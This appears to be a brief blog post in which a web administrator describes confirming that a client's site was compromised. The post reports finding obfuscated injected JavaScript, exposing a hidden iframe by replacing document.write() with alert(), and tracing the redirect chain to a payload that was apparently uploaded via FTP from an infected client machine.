I had a client who needed me to verify if a site he was hosting had indeed been hacked. The site had several obfuscated lines of JavaScript throughout most if not all of the pages of the site.

I was able to confirm the site was compromised without running the code on a VM or chancing with noscript on my machine by replacing all document.write() calls with alert().

Just as expected there was a nice iframe. Using wget I then confirmed that the iframe redirected to another iframe which redirected to a payload. The same network delivering the payload had also uploaded the modified files via ftp a few days earlier.

Since I found no cracking attempts on the sites ftp account I’m thinking the client’s client machine is part of the happy botnet.

This is the first time I’ve ran into an encrypted iframe and thought it was interesting.